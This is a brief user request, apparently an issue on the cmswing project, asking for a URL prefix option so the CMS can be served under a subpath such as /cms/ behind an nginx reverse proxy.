For example, the domain is www.xyz.com and I would like to map www.xyz.com/cms/ to cmswing. Could a prefix="cms" option be added to cmswing? That would make the nginx configuration convenient.